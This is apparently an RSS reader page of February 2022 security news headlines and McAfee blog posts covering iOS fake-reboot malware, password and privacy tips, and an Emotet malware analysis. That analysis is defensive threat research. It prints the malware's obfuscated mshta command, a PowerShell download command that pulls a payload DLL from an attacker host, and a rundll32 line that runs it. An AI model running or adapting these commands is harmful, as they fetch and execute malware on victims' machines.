FreshRSS

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Before yesterdaySecurity

Apple Releases Security Update for Webkit Flaw

By Dark Reading Staff, Dark Reading
A Webkit use-after-free vulnerability in iOS, iPadOS, Monterey, and Safari may already have been exploited, Apple said in a security advisory issued today.

  • February 10th 2022 at 21:49

Defense Contractors Need to Check Their Six

By Dark Reading Staff, Dark Reading
Companies overall met government standards, but poor credential management left vulnerabilities.

  • February 10th 2022 at 20:50

Dynatrace Adds Real-Time Attack Detection and Blocking, Advancing Cloud Application Security

Application Security Module unifies multicloud observability and advanced AIOps with real-time vulnerability management and defense.
  • February 10th 2022 at 19:15

Dynatrace Launches DevSecOps Automation Alliance Partner Program

Program enables alliance and solution partners to extend the capabilities of their DevSecOps offerings through seamless integrations with the Dynatrace platform.
  • February 10th 2022 at 19:05

Orca Security Adds Expanded CIEM Capabilities and Multi-Cloud Security Score to Cloud Platform

Expands cloud infrastructure entitlement management capabilities, adds cloud security benchmarking, and support for Kubernetes compliance frameworks.
  • February 10th 2022 at 19:00

Allure Security Raises $6.8 Million Seed Funding Round

Funding led by Gutbrain Ventures.
  • February 10th 2022 at 18:30

Titaniam Secures $6 Million in Seed Funding

Funding round led by Refinery Ventures, with participation from Fusion Fund and Shasta Ventures.
  • February 10th 2022 at 18:00

Data Transparency Hasn't Made Us Safer Yet. Can It Uncover Breach Causality?

By Michael Roytman, Chief Data Scientist, Kenna Security
Advanced machine learning models within an XDR framework could uncover what actually causes breaches, but first we need better data transparency.

  • February 10th 2022 at 15:00

Bot Marketplaces as a Source of Future Data Breaches

By Fahmida Y. Rashid, Features Editor, Dark Reading
Of the four bot marketplaces Cognyte analyzed, the Russian Market is the most dominant, but the others are all active, updated daily, and well-known, too.

  • February 10th 2022 at 13:38

Putting AI to Practical Use in Cybersecurity

By Pam Baker, Contributing Writer
Almost every cybersecurity product has an AI component. Here is where it's working in the real world.

  • February 10th 2022 at 02:00

Experts: Several CVEs From Microsoft's February Security Update Require Prompt Attention

By Jai Vijayan, Contributing Writer
Microsoft's release of relatively sparse vulnerability information makes it difficult for organizations to prioritize mitigation efforts, security experts say.

  • February 9th 2022 at 23:00

Linux Malware on the Rise

By Robert Lemos, Contributing Writer
Ransomware, cryptojacking, and a cracked version of the penetration-testing tool Cobalt Strike have increasingly targeted Linux in multicloud infrastructure, report states.

  • February 9th 2022 at 22:20

Auth0 Credential Guard Detects Breached Passwords to Prevent Account Takeover

New feature adds a dedicated security team and support for multiple languages to prevent fraudulent access with stolen credentials.
  • February 9th 2022 at 20:00

Log4j and the Role of SBOMs in Reducing Software Security Risk

By Walter Capitani, Director, Technical Product Management, GrammaTech
Enterprises are spending a pittance on securing their software supply chain, which makes COTS software dangerous — vulnerabilities can be "hidden" in open source components.

  • February 9th 2022 at 15:00

Mitigate Ransomware Risks With Modern Log Management

By Simon Simonsen, Sr. Security Architect, CrowdStrike
Enterprises using a modern log management platform have key tools in place to detect and mitigate some of the risks from a ransomware attack.

  • February 9th 2022 at 12:21

Self-styled “Crocodile of Wall Street” arrested with husband over Bitcoin megaheist

By Naked Security writer
The cops say they've recovered 80% of a $72 million cryptocoin heist... but the recovered funds alone are now worth over $4 billion!

Microsoft Issues 51 CVEs for Patch Tuesday, None 'Critical'

By Dark Reading Staff, Dark Reading
One publicly known flaw — an elevation-of-privilege bug in Windows Kernel — was included in the patches.

  • February 8th 2022 at 23:00

Google Cuts User Account Compromises in Half With Simple Change

By Robert Lemos, Contributing Writer
The online tech giant auto-enabled two-step verification for more than 150 million users, throwing up steep hurdles against scammers and attackers.

  • February 8th 2022 at 21:43

Get Started on Continuous Compliance Ahead of PCI DSS v4.0

By David Bisson, Contributing Writer
Here's what retailers and anyone collecting payments can do to prepare in the time remaining before the final release of PCI DSS 4.0 this quarter.

  • February 8th 2022 at 21:17

Threat Actors Revive 20-Year-Old Tactic in Microsoft 365 Phishing Attacks

By Jai Vijayan, Contributing Writer
Recent attacks involving so-called "right-to-left override" spoofing aimed at Microsoft 365 users show how attackers sometimes modify and improve old methods to try and stay one step ahead of defenders.

  • February 8th 2022 at 21:00

Prioritizing the Right Vulnerabilities to Reduce Risk

By Alyssa Ideboen, Product Marketing, Security Operations, CrowdStrike
Prioritization needs to be part of vulnerability management if security teams are to keep up and mitigate issues in a timely manner.

  • February 8th 2022 at 09:21

Vulnerability Scanning Triples, Leading to Two-Thirds Fewer Flaws

By Robert Lemos, Contributing Writer
Companies are scanning more applications for vulnerabilities — and more often.

  • February 8th 2022 at 18:19

Cyber Terrorism Is a Growing Threat & Governments Must Take Action

By Lionel Sigal, Head of CTI, CYE
With its benefits of deniability, relatively low costs, and the ability to attack from anywhere, cyber terrorism will increasingly threaten civilians everywhere.

  • February 8th 2022 at 18:00

At last! Office macros from the internet to be blocked by default

By Paul Ducklin
It's been a long time coming, and we're not there yet, but at least Microsoft Office will be a bit safer against macro malware...

Qualys Launches Context XDR

Qualys Context XDR provides the security context that operations teams need to eliminate false positives and noise by triangulating risk posture, asset criticality, and threat intelligence.
  • February 8th 2022 at 15:10

InterVision Unveils Ransomware Protection as a Service

InterVision RPaaS solution provides protection, response, and recovery in one managed service.
  • February 8th 2022 at 15:05

DeepSurface Security Secures $4.5M for Business Expansion

Funding round was led by Differential Ventures, an artificial intelligence and cybersecurity seed venture fund.
  • February 8th 2022 at 15:00

Salesforce DevOps Needs Guardrails

By Vernon Keenan, Senior Industry Analyst, SalesforceDevops.net
Some companies go too fast when it comes to SaaS, DevOps, and security, but smart developers and implementers will respect some basic guidelines to keep their product safe.

  • February 8th 2022 at 15:00

Russian APT Steps Up Malicious Cyber Activity in Ukraine

By Jai Vijayan, Contributing Writer
Actinium/Gameredon's attacks are another reminder of why organizations need to pay additional scrutiny to systems in the region.

  • February 7th 2022 at 23:31

FBI Publishes Indicators of Compromise for LockBit 2.0 Ransomware

By Dark Reading Staff, Dark Reading
Flash bulletin alert includes mitigation strategies for defending against the ransomware.

  • February 7th 2022 at 21:29

A Prophylactic Approach for Today's Vulnerable Websites and Web Apps

Take a proactive approach to client-side security: Why monitoring your JavaScript programming language is so important to your overall security posture.
  • February 7th 2022 at 20:00

SecurityScorecard Acquires LIFARS

SecurityScorecard adds digital forensics and incident response to strengthen its products.
  • February 7th 2022 at 20:00

When Multifactor Authentication Is Compromised: Fighting Back With AI

By Max Heinemeyer, Director of Threat Hunting, Darktrace
Now that attackers can bypass preventative controls, we need to find and stop the attackers when they're already inside.

  • February 7th 2022 at 19:30

Microsoft blocks web installation of its own App Installer files

By Paul Ducklin
It's a big deal when a vendor decides to block one of its own "features" for security reasons. Here's why we think it's a good idea.

Log4j: Getting From Stopgap Remedies to Long-Term Solutions

By Jeremy Colvin, Technical Product Marketer, Uptycs
This pervasive vulnerability will require continued care and attention to fully remediate and detect permutations. Here are some ways to get started.

  • February 7th 2022 at 15:00

Name That Edge Toon: Head of the Table

By John Klossner, Cartoonist
Come up with a clever caption, and our panel of experts will reward the winner with a $25 Amazon gift card.

  • February 7th 2022 at 14:10

How iOS Malware May Snoop on Our Devices

By Vishnu Varadaraj

Smartphones have become such an integral part of our lives that it’s hard to imagine a time when we didn’t have them. We carry so much of our lives on our devices, from our social media accounts and photos of our pets to our banking information and home addresses. Whether it be just for fun or for occupational purposes, so much of our time and attention is spent on our smartphones. 

Because our mobile devices carry so much valuable information, it’s important that we stay educated on the latest cyber schemes so we can be prepared to combat them and keep our data safe.  According to Bleeping Computer, researchers have developed a trojan proof of concept tool that fakes a shutdown or reboot of iPhones, preventing malware from being removed and allowing hackers to secretly snoop on microphones and cameras.  

Let’s dive into the details of this technique.  

How “NoReboot” allows hackers to spy on a device 

Typically, when an iOS device is infected with malware, the solution is as simple as just restarting the device. However, with this new technique researchers are calling “NoReboot,” ridding a device of malware is not quite as simple. 

“NoReboot” blocks the shutdown and reboot process from being carried out, preventing the device from actually restarting. Without a proper shutdown and reboot, a malware infection on an iOS device can continue to exist. Because the device appears to be shut off with a dark screen, muted notifications, and a lack of response, it is easy to assume that the device has shut down properly and the problem has been solved. However, the “NoReboot” technique has only simulated a reboot, allowing a hacker to access the device and its functions, such as its camera and microphone. If a hacker has access to these functions, they could record the user without their knowledge and potentially capture private information.  

This attack is not one that Apple can fix, as it relies on human-level deception rather than exploiting flaws found on iOS. That’s why it’s important that we know how to use our devices safely and stay protected. 

How to know if your smartphone has been hacked 

As previously mentioned, smartphone usage takes up a big chunk of our time and attention. Since we are so often on these devices, it is usually fairly easy to tell when something isn’t working quite like it is supposed to. While these things could very well just be technical issues, sometimes they are much more than that, such as malware being downloaded onto your smartphone. 

Malware can eat up the system resources or conflict with other apps on your device, causing it to act oddly. 

Some possible signs that your device has been hacked include: 

Performance issues 

A slower device, webpages taking way too long to load, or a battery that never keeps a charge are all things that can be attributed to a device reaching its retirement. However, these things may also be signs that malware has compromised your phone. 

Your phone feels like it’s running hot 

Malware running in the background of a device may burn extra computing power, causing your phone to feel hot and overheated. If your device is quick to heat up, it may be due to malicious activity. 

Mysterious calls, texts, or apps appear 

If apps you haven’t downloaded suddenly appear on your screen, or if outgoing calls you don’t remember making pop up on your phone bill, that is a definite red flag and a potential sign that your device has been hacked. 

Pop-ups or changes to your screen 

Malware may also be the cause of odd or frequent pop-ups, as well as changes made to your home screen. If you are getting an influx of spammy ads or your app organization is suddenly out of order, there is a big possibility that your device has been hacked. 

Six tips to prevent your phone from being hacked 

To avoid the hassle of having a hacked phone in the first place, here are some tips that may help. 

1. Update your phone and its apps

Promptly updating your phone and apps is a primary way to keep your device safe. Updates often fix bugs and vulnerabilities that hackers rely on to download malware for their attacks. 

2. Avoid downloading from third-party app stores

Apple’s App Store and Google Play have protections in place to help ensure that apps being downloaded are safe. Third-party sites may not have those same protections or may even be purposely hosting malicious apps to scam users. Avoiding these sites altogether can prevent these apps from allowing hackers into your device. 

3. Stay safer on the go with a VPN

Hackers may use public Wi-Fi to gain access to your device and the information you have inside of it. Using a VPN to ensure that your network is private and only you can access it is a great way to stay protected on the go. 

4. Turn off your Wi-Fi and Bluetooth when not in use

Turning off your Wi-Fi and Bluetooth when you are not actively using them is a simple way to prevent skilled hackers from working their way into your devices. 

5. Avoid public charging stations

Some hackers have been known to install malware into public charging stations and hack into devices while they are being charged. Investing in your own personal portable charging packs is an easy way to avoid this type of hack.  

6. Encrypt your phone

Encrypting your phone can protect your calls, messages, and information, while also protecting you from being hacked. iPhone users can check their encryption status by going into Touch ID & Passcode, scrolling to the bottom, and seeing if data protection is enabled.  

7. Determine whether your device rebooted properly

Although researchers agree that you can never trust a device to be fully off, there are some techniques that can help you determine whether your device was rebooted correctly.2 If you do suspect that your phone was hacked or notice some suspicious activity, restart your device. To do this, press and hold the power button and either volume button until you are prompted to slide the button on the screen to power off. After the device shuts down and restarts, notice if you are prompted to enter your passcode to unlock the device. If not, this is an indicator that a fake reboot just occurred. If this happens, you can wait for the device to run out of battery, although researchers have not verified that this will completely remove the threat.  

Stay protected 

If you are worried that your device has been hacked, follow these steps: 

  • Install and run security software on your smartphone if you haven’t already. From there, delete any apps you didn’t download, delete risky texts, and then run your mobile security software again. 
  • If you still have issues, wiping and restoring your phone is an option. Provided you have your photos, contacts, and other vital info backed up in the cloud, it’s a relatively straightforward process. A quick search online can show how to wipe and restore your model of phone. 
  • Lastly, check your accounts and your credit to see if any unauthorized purchases have been made. If so, you can go through the process of freezing those accounts, getting new cards, and credentials issued with the help of McAfee Identity Protection Service. Further, update your passwords for your accounts with a password that is strong and unique

The post How iOS Malware May Snoop on Our Devices appeared first on McAfee Blog.

Emotet’s Uncommon Approach of Masking IP Addresses

By McAfee Labs

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers
Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT OBFUSCATED CMD DEOBFUSCATED CMD
Hexadecimal cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html http://185[.]7[.]214[.]7/fer/fer.html
Octal cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution
Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on browser
Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line (New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE VALUE SCANNER DETECTION NAME
XLS 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c McAfee LiveSafe and Total Protection X97M/Downloader.nn
DLL a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 McAfee LiveSafe and Total Protection

 

Emotet-FSY
HTML URL http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor Blocked
DLL URL http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor Blocked

MITRE ATT&CK

TECHNIQUE ID TACTIC TECHNIQUE DETAILS DESCRIPTION
T1566 Initial access Phishing attachment Initial maldoc uses phishing strings to convince users to open the maldoc
T1204 Execution User Execution Manual execution by user
T1071 Command and Control Standard Application Layer Protocol Attempts to connect through HTTP
T1059 Command and Scripting Interpreter Starts CMD.EXE for commands execution Excel uses cmd and PowerShell to execute command
T1218

 

Signed Binary Proxy Execution Uses RUNDLL32.EXE and MSHTA.EXE to load library rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

The 3 Most Common Causes of Data Breaches in 2021

By Edge Editors, Dark Reading
Phishing, smishing, and business email compromise continue to do their dirty work.

  • February 4th 2022 at 21:23

Expert Insights: Training the Data Elephant in the AI Room

By Gary McGraw Ph.D., Co-founder Berryville Institute of Machine Learning
Be aware of the risk of inadvertent data exposure in machine learning systems.

  • February 4th 2022 at 20:16

Wormhole cryptotrading company turns over $340,000,000 to criminals

By Paul Ducklin
It was the best of blockchains, it was the worst of blockchains... as Charles Dickens might have said.

China-Linked Group Attacked Taiwanese Financial Firms for 18 Months

By Robert Lemos, Contributing Writer
The Antlion group, also known as Pirate Panda and Tropic Trooper, has shifted to targeting mainly Taiwan, using custom backdoors against financial organizations.

  • February 4th 2022 at 16:18

Want to Be an Ethical Hacker? Here's Where to Begin

By Luke Stephens (aka Hakluke), Security Researcher and Detectify Crowdsource Hacker
By utilizing these resources, beginner hackers can find their specific passions within the cybersecurity space and eventually make their own mark in the ethical hacking profession.

  • February 4th 2022 at 15:00

Privacy in Practice: Securing Your Data in 2022 and Beyond

By McAfee

Every year we can count on new technology to make our lives easier. Right? As beneficial and convenient as tech can be, it can also pose risks to our online safety and privacy—risks that we should be prepared to handle. Increasingly, we’re seeing governments around the world implementing stricter privacy laws. And even major players like Google are phasing out invasive tracking technology like cookies. However, when it comes to activities like banking, shopping, taxes, and more, the need for broader online privacy protection has never been greater. Let’s take a look at some prominent trends in the way we now live online and how we can protect our data.  

Web3

Crypto, the blockchain, NFTs, tokens – all of these terms are considered part of what’s being termed Web3. Whereas Web 2.0 described an internet made up of large corporations hosting content and consumers, Web3 is governed by the blockchain. What this means is that applications use a decentralized online ledger to document transactions of all sorts. The most famous example is bitcoin, a blockchain that acts as a digital currency. Another example would be NFTs, which are digital works of art. Web3 may be in its infancy, but it’s important to consider what this means for privacy and data protection. Blockchain affords users anonymity in regards to currencies like bitcoin. Of course that means bitcoin also has a reputation as the currency of choice for money-launderers and other shady enterprises. Still, that means it’s good for privacy, right? Well, maybe. The EU’s GDPR rights to erase or amend data are at odds with transactions on a blockchain, which are essentially unchangeable. So if you’re buying cryptocurrency, NFTs, or interacting with blockchains in other ways, just understand your personal information might be hidden, but the record of your transactions is totally visible. 

Tip: If you’re keeping cryptocurrencies in an online wallet, you’ll want to use an identity protection service to monitor those account credentials so you can be warned of breaches and leaks onto the dark web. 

 Education

Student privacy is a top concern as households turn to remote learning. In a rush to optimize remote learning experiences in the face of a rapidly evolving digital landscape, many educators and remote learners may not realize the hazards that put student privacy at risk. 

Since 2020, schools have adopted a range of technologies to optimize the digital classroom, including virtual learning platforms, holistic learning solutions, and even social media applications. However, many of these digital platforms are not designed for child usage, nor do they have privacy policies in place to ensure that the student data gathered is protected. Many learning platforms may even treat student data as consumer data, raising more red flags regarding student data privacy and compliance. Online learning has also garnered the attention of cybercriminals looking to exploit student data, resulting in online bullying, identity theft, and more. 

For educators and parents alike, knowledge is the greatest asset to mitigating the risks of remote learning. IT teams and educators must understand the implications of the student data they collect, govern access to it, and control its usage to comply with child privacy regulations. Parents can take proper precautions by discussing the importance of privacy with their children. Keeping learning platforms up to date and monitoring their children to prevent them from downloading suspicious apps or straying to unknown websites are all ways to ensure safer remote learning environments. 

Tip: Getting a VPN for the family to use is a great way to safeguard your privacy while your kids are learning online. 

Work

Remote work has become commonplace nowadays as more companies permit their employees to work from home long-term and, for some, permanently. In a recent Fenwick poll among HR, privacy, and security professionals across industries, approximately 90% of employees now handle intellectual property, confidential, and personal information in their homes. Endpoint security, or the protection of end-user devices such as our laptops and mobile devices, poses more of a concern as employees trade in office networks for their in-home Wi-Fi. If these devices and networks are unsecured or if the data is not encrypted, employees run the risk of exposing sensitive information to hackers. Those of us working from home can help ensure the safety of our company’s confidential information by boosting our awareness of security threats and prevention measures via company-mandated security training.  

Tip: McAfee’s Protection Score is a great way to understand how protected you are online and what you can do to stay more secure 

The Metaverse

This buzzy term is being used to describe Meta’s (previously Facebook) vision for a fully connected future. Right now it exists as an AR/VR space accessible through Meta’s own VR hardware, Oculus. However, the terminology has caught on as a catch-all for platforms that may contain work, business, gaming, entertainment, social interactions, and more in one easily navigable, immersive online setting. Web3 features, like blockchain, NFTs, and cryptocurrencies are being touted as integral parts of the metaverse. As exciting and futuristic as this is, there are major privacy questions that will have to be answered. This means that as customers you’ll want to think hard about what you choose to share through the metaverse and look into the privacy settings a platform offers you.  

Tip: Use comprehensive online protection. McAfee Total Protection secures all aspects of your life online. From identity to online connections to antivirus, a full security suite like Total Protection keeps you and your family safer on all the devices you use and places you go online. 

 Personal Finances

Some of the platforms I use the most allow me to keep track of and manage my finances. Whether it’s my mobile banking app or taking advantage of online tax filing, there is such a convenience in having the ability to pay bills, deposit checks, and more, all with the devices I use every day. But many of us may not realize just how much trust we put into these platforms to protect our online privacy, especially when we don’t have a clear picture of who exactly is on the other end of our online transactions. 

While recognizing the signs of online banking and tax-related fraud helps ease the burdens associated with these schemes, there are multiple steps users can take to prevent becoming a victim of these scams in the first place.  

Tip: Full-featured identity protection will protect you financially. Services like McAfee Identity Protection Service include credit checks, identity theft restoration, and even stolen fund restoration as benefits. 

Digital devices are part of how we live our lives every day, whether we’re taking conference calls on our laptops, tracking the latest mile on our smartwatches, or banking on the go. Although our everyday digital devices make our lives that much more convenient, securing them makes our lives that much safer by minimizing online threats to ourselves and those around us. Safeguarding the digital platforms we use for work, school, finances, you name it, is the first step to ensuring our private information remains just that—private. 

The post Privacy in Practice: Securing Your Data in 2022 and Beyond appeared first on McAfee Blog.

It’s Data Privacy Day: Here’s How to Stay Protected in 2022

By McAfee

When you logged on to your computer this morning, data privacy probably wasn’t the first thing you were thinking about. The same goes for when you opened your phone to catch up on social media and check emails, turned on your smart TV for a family movie night, or all the other ways we routinely use our connected devices in our everyday lives.  

Although we live in an increasingly connected world, most of us give little thought to data privacy until after our personal information has been compromised. However, we can take proactive steps to help ourselves and our loved ones navigate this environment in a safe way. On January 28th – better known as Data Privacy Day – we have the perfect opportunity to own our privacy by taking the time to safeguard data. By making data privacy a priority, you and your family can enjoy the freedom of living your connected lives online knowing that your information is safe and sound.  

Data Security vs. Data Privacy 

Did you know that there is a difference between data security and data privacy? Although the two are intimately intertwined, there are various characteristics of each that make them different. National Today3 provides a useful analogy to define the two:  

  • Data security is like putting bars on your windows to make it difficult for someone to break into your home (guarding against potential threats).  
  • Data privacy is like pulling down the window shades so no one can look inside to see what you are wearing, who lives with you, or what you’re doing (ensuring that only those who are authorized to access the data can do so).   

At this point, we already know not to share our passwords or PIN numbers with anyone. But what about the data that is collected by companies every time we sign up for an email newsletter or make an online account? Oftentimes, we trust these companies to guard the personal data they collect from us in exchange for the right to use their products and services. However, the personal information collected by companies today is not regarded as private by default, with a few exceptions. For this reason, it’s up to us to take our data privacy into our own hands.  

The Evolution of Data Breaches  

Because we spend so much of our day online, plenty of our information is available on the internet. But what happens if one of your favorite online retailers experiences a data breach? This is the reality of the world we live in today, as data breaches have been on the rise and hackers are continuously finding clever, new ways to access our devices and information.   

Thanks to the COVID-19 pandemic, we’ve become more reliant on technology than ever before. Whether it be for distance learning, online shopping, mobile banking, or remote work, we’ve all depended on our devices and the internet to stay connected. But with more time online comes more opportunities for cybercriminals to exploit. For example, with the massive increase in remote work since the onset of the pandemic, hackers have hijacked online meetings through a technique called ‘Zoombombing4.’ This occurred after the online conferencing company shared personal data with Facebook, Google, and LinkedIn. Additionally, the number of patient records breached in the healthcare industry jumped to 21.3 million in the second half of 2020 due to the increase in remote interactions between patients and their providers5 

When it comes to data breaches, any business is a potential target because practically every business is online in some way. When you put this in perspective, it’s important to consider what information is being held by the companies that you buy from. While a gaming service will likely have different information about you than your insurance company, you should remember that all data has value, and you should take steps to protect it like you would money.  

Protecting Your Privacy With McAfee  

Your browsing history and personal information are private, and we at McAfee want to keep it that way. By using McAfee Secure VPN, you can browse confidently knowing that your data is encrypted.  

To further take control of your data privacy, monitor the health of your online protection with McAfee’s Protection Score. This tool provides simple steps to improve your security and allows you to know how safe you are online, which is the first step towards a safer, more confident connected life. Check your personal protection score here

Here are a few more tips to keep you on top of your data privacy game:  

1. Update your privacy and security settings. Begin with the websites and apps that you use the most. Check to see if your accounts are marked as private, or if they are open to the public. Also, look to see if your data is being leaked to third parties. You want to select the most secure settings available, while still being able to use these tools correctly.  

2. Lock down your logins. Secure your logins by making sure that you are creating long and unique passphrases for all your accounts. Use multi-factor identification, when available. 

3. Protect your family and friends. You can make a big difference by encouraging your loved ones to protect their online privacy. By helping others create solid safety habits as they build their digital footprints, it makes all of us more secure. 

Follow the conversation this Data Privacy Day by following #PrivacyAware and #DataPrivacyDay on social media. 

The post It’s Data Privacy Day: Here’s How to Stay Protected in 2022 appeared first on McAfee Blog.

Passwords are Like Toothbrushes – Not to Be Shared!!

By Alex Merton-McCann

Sometimes, I feel that my brain is full! We are all bombarded with information on so many fronts and quite frankly, I often feel like I don’t have room for much more! A quick scroll on my socials and I’m inundated with news from friends (which I love) plus ads plus multiple news updates. I open my emails, and the same happens! So much information!! So little time! 

So, in the spirit of being brief and not overloading, I’m going to focus on one easy yet powerful way you can make a positive impact on your online safety – how you manage your password. Of course, I could add many more strategies to this list but let’s keep it simple – our brains are full!! 

Why Are Passwords So Important? 

Passwords are the key to everything we do online. Whether we are logging in to our emails, social media platforms, online banking, or favorite shopping websites – your password is your way in. And if you’re anything like me, you probably have multiple passwords. The last time I checked, I had over 100 different passwords stored in my True Key password manager! 

These small codes are so incredibly important because in short, they are the only thing stopping a hacker from accessing your online accounts. In many cases, they are your only defense strategy against a hacker taking over your accounts and creating havoc.  

Fortunately, there are several steps we can take to ensure we nail this password thing and minimize the risk of being hacked. Here are my top five: 

1. Don’t Share Your Passwords – no exceptions!! 

I have been saying to my kids for years: passwords are like toothbrushes – they are NOT to be shared! No exceptions. It doesn’t matter how much you love your best friend or girlfriend, your password is your password. When you are young and donning rose-colored glasses, you often don’t factor in that things can change. Relationships can sour and romance can die. If someone has access to your online accounts and they have hurt feelings then they have an opportunity to create chaos. And we’ve all read the stories… 

2. Use Different Passwords For Each Account 

Yes, I agree – this is a big pain! But it is probably one of the best ways of protecting yourself and here’s why. If you use the same password for each of your online accounts and your account is hacked then the hacker has access to all of your online accounts: your social media platforms, your banking, your entire life!  

3. Turn On 2 Factor Authentication Where Possible 

It will add another step to your login process but choosing 2-factor authentication (or multi-factor authentication) is another small yet powerful way to keep your password secure by adding another layer of protection to your passwords. In most cases, the additional factor is a code or a token sent to your mobile phone. Sometimes, a separate app can also be used to generate a code or token that will confirm it is really you trying to log in! 

4. Create Long and Complex Passwords 

Some experts believe length is more important than complexity but I say embrace both! If you can create a complex 16 character password that includes lower and upper case letters, numbers and symbols then you are doing very well! I am personally a fan of the crazy, nonsensical sentence. For example – GrassisRed&Blue7 – silly, nonsensical but memorable. I believe it’s all about making them hard to guess but easy to remember. And remember to NEVER use information in your passwords that other people might know about you or that is also included in your social media accounts eg your kids’ or pet’s names. 

5. Use A Password Manager 

I am sure my longevity has improved dramatically since using a password manager! Password managers, or vaults, are an absolute no-brainer. Not only do they store your passwords securely across your chosen devices, but they also help you create complex passwords that no human could even contemplate. I have it installed on both my laptop and my phone and it works seamlessly between both devices. It’s time to throw away your little black book of passwords, people! You’ll never look back once this whole password management process is automated. 

So, if you’re feeling a little overwhelmed at where to start with your digital safety this New Year then I implore you to make this one small change. Nailing your password strategy is without doubt one of the best ways of shoring up your online safety!  

Happy New Year!! 

Alex xx 

The post Passwords are Like Toothbrushes – Not to Be Shared!! appeared first on McAfee Blog.

Mac Malware-Dropping Adware Gets More Dangerous

By Jai Vijayan, Contributing Writer
The authors of UpdateAgent have tweaked it yet again — for the fifth time in less than 18 months.

  • February 3rd 2022 at 23:05

Mandiant Bolsters SaaS Platform With Integration of New Attack Surface Management Module

New automated offering helps organizations gain comprehensive visibility across IT environments, continuously monitor for vulnerabilities, operationalize threat intelligence and manage risk.
  • February 3rd 2022 at 23:00

Several India-Based Call Centers Indicted by US DoJ

By Dark Reading Staff, Dark Reading
"Scam robocall" operators face charges for defrauding US citizens.

  • February 3rd 2022 at 22:30

The Future of Cybersecurity: Our Predictions for 2022

New technologies and workplace trends are fueling a global explosion in cybercrime. Discover the threats to watch out for in 2022.
  • February 3rd 2022 at 22:00

Tenable Launches Suite of New Features to Cloud-Native Application Security Platform

Tenable.cs enhancements secure cloud resources, container images, and cloud assets
  • February 3rd 2022 at 22:00

Research From Quantum and ESG Reveals Top Challenges in Data Management

Unstructured data management, storage complexity and cost remain barriers to adoption, resulting in valuable data being discarded or mismanaged.
  • February 3rd 2022 at 21:55

DHS Launches Cyber Safety Review Board to Analyze Major Vulnerability Events

By Robert Lemos, Contributing Writer
The US Department of Homeland Security has named a 15-member review board to assess significant cybersecurity events and recommend improvements - starting with the Log4J vulnerability.

  • February 3rd 2022 at 21:50

Microsoft: Multifactor Adoption Remains Low

By Kelly Jackson Higgins, Editor-in-Chief
New data shows a slow roll to strong authentication for most enterprise Windows systems.

  • February 3rd 2022 at 21:00

BIO-key to Expand Customer Reach and Talent in EMEA Region

Expansion comes via definitive agreement to acquire authentication solutions provider Swivel Secure Europe.
  • February 3rd 2022 at 21:00

Keeper Security Acquires Glyptodon

The acquisition enables distributed teams to connect to remote or cloud infrastructure in a hyper-secure, agentless and passwordless way without a VPN.
  • February 3rd 2022 at 21:00

BreachQuest Welcomes Sandy Dunn as Chief Information Security Officer

Industry cybersecurity veteran joins executive team of leading cyber experts with key experience In healthcare market.
  • February 3rd 2022 at 21:00

HackNotice Releases Combined Security and Threat Awareness Service for Free

HackNotice users can now deepen their security awareness with a self-paced training course to prevent themselves from being targets of cyberattacks.
  • February 3rd 2022 at 21:00
❌